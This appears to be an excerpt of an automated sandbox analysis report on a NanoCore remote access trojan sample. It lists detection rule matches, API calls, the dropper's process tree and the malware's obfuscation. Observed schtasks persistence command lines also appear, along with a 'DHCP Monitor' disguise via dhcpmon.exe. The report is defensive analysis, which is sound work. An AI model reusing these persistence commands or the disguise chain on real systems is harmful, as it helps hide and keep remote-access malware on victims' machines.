        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_004233A3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,13_2_004233A3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: String function: 00CBD870 appears 35 times
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: String function: 00CBE2F0 appears 31 times
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: String function: 00CBD940 appears 51 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00420165 appears 35 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 004359E6 appears 70 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 004014F7 appears 45 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00406B90 appears 73 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00408115 appears 40 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 0040333F appears 36 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 003F1D10 appears 31 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00412160 appears 34 times
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CA6FC6
        Source: dAkJsQr7A9.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile created: C:\Users\user\31956653Jump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@27/41@10/1
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA6D06 GetLastError,FormatMessageW,0_2_00CA6D06
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CB963A
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs'
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: dAkJsQr7A9.exeReversingLabs: Detection: 59%
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile read: C:\Users\user\Desktop\dAkJsQr7A9.exeJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\dAkJsQr7A9.exe 'C:\Users\user\Desktop\dAkJsQr7A9.exe'
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs'
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcpJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcpJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_004233A3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,13_2_004233A3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00454AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,13_2_00454AEB
        Source: C:\Users\user\31956653\xmjk.pifFile created: C:\Users\user\temp\eblsq.pptJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0045E0F6 CoInitialize,CoCreateInstance,CoUninitialize,13_2_0045E0F6
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0044D606 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,13_2_0044D606
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00423EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,4_2_00423EC5
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ba2baad0-dd3f-4844-a1e3-4d042f9ae8b6}
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCommand line argument: sfxname0_2_00CBCBB8
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCommand line argument: sfxstime0_2_00CBCBB8
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCommand line argument: STARTDLG0_2_00CBCBB8
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: dAkJsQr7A9.exeStatic file information: File size 1103745 > 1048576
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: dAkJsQr7A9.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dAkJsQr7A9.exe, 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
        Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000006.00000003.518192059.00000000013AE000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb, source: xmjk.pif, 00000004.00000003.359156674.0000000001329000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000003.448460705.0000000001378000.00000004.00000001.sdmp, RegSvcs.exe, 0000000A.00000002.365790263.0000000000692000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBE336 push ecx; ret 0_2_00CBE349
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBD870 push eax; ret 0_2_00CBD88E
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00406BD5 push ecx; ret 4_2_00406BE8
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0041D53C push 740041CFh; iretd 13_2_0041D541
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00406BD5 push ecx; ret 13_2_00406BE8
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_003FEE30 LoadLibraryA,GetProcAddress,4_2_003FEE30
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile created: C:\Users\user\31956653\__tmp_rar_sfx_access_check_6298156Jump to behavior
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

        Persistence and Installation Behavior:

        Drops PE files with a suspicious file extension
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exe, File created: C:\Users\user\31956653\xmjk.pif
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: C:\Users\user\31956653\xmjk.pif, File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

